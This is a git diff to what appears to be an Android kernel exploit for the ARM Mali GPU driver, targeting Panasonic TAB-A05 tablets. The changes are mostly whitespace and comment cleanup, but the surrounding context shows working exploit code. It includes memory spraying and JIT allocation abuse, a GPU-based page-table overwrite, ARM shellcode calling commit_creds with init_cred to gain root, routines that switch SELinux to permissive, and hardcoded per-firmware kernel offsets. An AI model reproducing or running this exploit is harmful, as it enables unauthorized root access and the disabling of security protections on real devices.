diff --git a/mali_base_jm_kernel.h b/mali_base_jm_kernel.h index 3f5a460..844c3da 100644 --- a/mali_base_jm_kernel.h +++ b/mali_base_jm_kernel.h @@ -831,7 +831,6 @@ struct base_jd_atom_v2 { // __u8 jobslot; //missing from Bifrost r16p0 base_jd_core_req core_req; // __u8 renderpass_id; //missing from Bifrost r16p0 - }; */ typedef struct base_jd_atom_v2 { @@ -1233,4 +1232,3 @@ struct base_dump_cpu_gpu_counters { }; #endif /* _UAPI_BASE_JM_KERNEL_H_ */ - diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index b84c0ba..ecead8e 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -22,7 +22,7 @@ #include #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) -#endif //SHELL +#endif // SHELL #define MALI "/dev/mali0" @@ -36,7 +36,7 @@ #define SPRAY_NUM 64 -#define FLUSH_SIZE (0x1000 * 0x1000) //increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100) +#define FLUSH_SIZE (0x1000 * 0x1000) // increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100) #define SPRAY_CPU 0 @@ -50,7 +50,7 @@ #define NUM_TRIALS 100 -#define KERNEL_BASE 0x40080000//raven's kernel load address +#define KERNEL_BASE 0x40080000 #define OVERWRITE_INDEX 256 @@ -63,17 +63,17 @@ #define ADD_COMMIT_INDEX 3 /* -base address = do_undefinstr - 0x1000 -COMMIT_CREDS = commit_creds - base address -AVC_DENY= avc_denied.isra.4 - base address -SEL_READ_ENFORCE = sel_read_enforce - base address -SEL_READ_HANDLE_UNKNOWN = sel_read_handle_unknown - base address +KERNEL_BASE = do_undefinstr - 0x1000 +COMMIT_CREDS = commit_creds - KERNEL_BASE +AVC_DENY= avc_denied.isra.4 - KERNEL_BASE +SEL_READ_ENFORCE = sel_read_enforce - KERNEL_BASE +SEL_READ_HANDLE_UNKNOWN = sel_read_handle_unknown - KERNEL_BASE Need: Ghidra Search: prepare_kernel_cred -> -INIT_CRED = mov - base address +INIT_CRED = mov - KERNEL_BASE Search: sel_read_enforce -> -SELINUX_ENFORCING = ldr - base address +SELINUX_ENFORCING = ldr - KERNEL_BASE Need: ARM to HEX ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED) @@ -83,13 +83,16 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED) // TAB-A05-BD 01.00.000 #define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc #define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80 -#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 //0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add -#define INIT_CRED_CTX_01_00_000 0x11553f0 //0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0 -#define COMMIT_CREDS_CTX_01_00_000 0x5a120 //0xffffff80080da120 - 0xffffff8008080000 = 0x5a120 +#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 // 0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add +#define INIT_CRED_CTX_01_00_000 0x11553f0 // 0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0 +#define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120 #define ADD_INIT_CTX_01_00_000 0x910fc000 #define ADD_COMMIT_CTX_01_00_000 0x91048108 -//avc_denied.isra.4 -#define AVC_DENY_CTX_01_00_000 0x35acc8 //0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add +#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add + +/* + * Maintained by Syuugo + */ // TAB-A05-BD 01.01.001 #define COMMIT_CREDS_CTX_01_01_001 0x5a120 @@ -180,7 +183,7 @@ static uint64_t avc_deny; static uint64_t selinux_enforcing_READ = 0X0; static uint64_t selinux_enforcing_WRITE = 0X0; /* -Overwriting SELinux to permissive + Overwriting SELinux to permissive strb wzr, [x0] mov x0, #0 ret @@ -201,15 +204,15 @@ static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; struct base_mem_handle { - struct { - __u64 handle; - } basep; + struct { + __u64 handle; + } basep; }; struct base_mem_aliasing_info { - struct base_mem_handle handle; - __u64 offset; - __u64 length; + struct base_mem_handle handle; + __u64 offset; + __u64 length; }; static int open_dev(char* name) { @@ -225,11 +228,11 @@ void setup_mali(int fd, int group_id) { if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { err(1, "version check failed\n"); } - //struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + // struct kbase_ioctl_set_flags set_flags = {group_id << 3}; struct kbase_ioctl_set_flags set_flags = {0}; if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { err(1, "set flags failed\n"); - } + } } @@ -258,7 +261,7 @@ void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr, uint64_t* gpu_alloc_region) { struct base_jit_alloc_info info = {0}; struct base_jd_atom_v2 atom = {0}; - + info.id = id; info.gpu_alloc_addr = gpu_alloc_addr; info.va_pages = va_pages; @@ -276,7 +279,7 @@ uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - return *((uint64_t*)gpu_alloc_region); + return *((uint64_t*)gpu_alloc_region); } void jit_free(int fd, uint8_t atom_number, uint8_t id) { @@ -295,7 +298,7 @@ void jit_free(int fd, uint8_t atom_number, uint8_t id) { if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - + } void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) { @@ -436,7 +439,7 @@ void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; // | (1 << 22); int prot = PROT_READ | PROT_WRITE; alloc.in.va_pages = pages; - alloc.in.commit_pages = pages; //alloc.in.commit_pages = 0; + alloc.in.commit_pages = pages; // alloc.in.commit_pages = 0; mem_alloc(mali_fd, &alloc); reserved_va[i] = alloc.out.gpu_va; } @@ -478,7 +481,7 @@ uint64_t alias_sprayed_regions(int mali_fd) { } alias_regions[i] = this_region; } - // return (uint64_t)(alias_regions[0]); + //return (uint64_t)(alias_regions[0]); return (uint64_t)alias.out.gpu_va; } @@ -540,7 +543,7 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { int32_t immlo = (offset >> 12) & 0x3; uint32_t adpr = rd & 0x1f; adpr |= (1 << 28); - adpr |= (1 << 31); //op + adpr |= (1 << 31); // op adpr |= immlo << 29; adpr |= (immhi_mask & (immhi << 5)); return adpr; @@ -549,10 +552,10 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); - //Sets x0 to init_cred + // Sets x0 to init_cred root_code[ADRP_INIT_INDEX] = init_adpr; root_code[ADD_INIT_INDEX] = add_init; - //Sets x8 to commit_creds + // Sets x8 to commit_creds root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); root_code[ADD_COMMIT_INDEX] = add_commit; root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] @@ -563,10 +566,10 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_en void fixup_root_shell_nop() { - //Sets x0 to init_cred + // Sets x0 to init_cred root_code[ADRP_INIT_INDEX] = 0xD503201F; root_code[ADD_INIT_INDEX] = 0xD503201F; - //Sets x8 to commit_creds + // Sets x8 to commit_creds root_code[ADRP_COMMIT_INDEX] = 0xD503201F; root_code[ADD_COMMIT_INDEX] = 0xD503201F; root_code[4] = 0xD503201F; // stp x29, x30, [sp, #-0x10] @@ -578,10 +581,10 @@ void fixup_root_shell_nop() { void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) { uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred); - //Sets x0 to init_cred + // Sets x0 to init_cred root_code_un[ADRP_INIT_INDEX] = init_adpr; root_code_un[ADD_INIT_INDEX] = add_init; - //Sets x8 to commit_creds + // Sets x8 to commit_creds root_code_un[ADRP_COMMIT_INDEX] = write_adrp(8, read_handle_unknown, commit_cred); root_code_un[ADD_COMMIT_INDEX] = add_commit; root_code_un[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] @@ -609,7 +612,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e struct MALI_JOB_HEADER jh = {0}; jh.is_64b = true; jh.type = MALI_JOB_TYPE_WRITE_VALUE; - + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; payload.type = type; payload.immediate_value = value; @@ -777,7 +780,7 @@ void select_offset() { fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004); return; } - + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys")) { selinux_enforcing = SELINUX_ENFORCING_CTZ_01_02_005; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005; @@ -832,22 +835,22 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved //Triggers avc_denied to disable SELinux open("/dev/kmsg", O_RDONLY); */ -// uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; -// write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); -// printf("sel_read_enforce_addr is %llx avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr); + //uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; + //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + //printf("sel_read_enforce_addr is %llx avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr); uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - -// uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; -// write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - + + //uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443; + //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + usleep(100000); - - //Call commit_creds to overwrite process credentials to gain root + + // Call commit_creds to overwrite process credentials to gain root write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t)); -// write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); -// write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); + //write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); + //write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); } @@ -884,7 +887,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { err(1, "gpu_alloc_region mmap failed"); } uint64_t jit_pages = SPRAY_PAGES; - uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region); + uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region); atom_number++; mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0); @@ -921,12 +924,12 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { atom_number++; write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0])); usleep(100000); - write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); usleep(100000); printf("time to run_enforce\n"); - run_enforce(); - run_enforce_un(); - //run_enforce_write(); + run_enforce(); + run_enforce_un(); + //run_enforce_write(); cleanup(mali_fd, pgd); return 0; } diff --git a/midgard.h b/midgard.h index e0ce432..d05cf25 100644 --- a/midgard.h +++ b/midgard.h @@ -1,7 +1,7 @@ #ifndef MIDGARD_H #define MIDGARD_H -//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone +// Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone #include #include @@ -41,7 +41,7 @@ __gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) { uint64_t val = 0; const int width = end - start + 1; - const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 ); + const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1); for (int byte = start / 8; byte <= end / 8; byte++) { val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); @@ -64,13 +64,13 @@ enum mali_job_type { }; enum mali_write_value_type { - MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, - MALI_WRITE_VALUE_TYPE_ZERO = 3, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, - MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, }; @@ -240,7 +240,7 @@ struct mali_write_value_job_packed { uint32_t opaque[14]; }; -#define MALI_JOB_HEADER_header \ +#define MALI_JOB_HEADER_header \ .is_64b = true #define MALI_WRITE_VALUE_JOB_LENGTH 56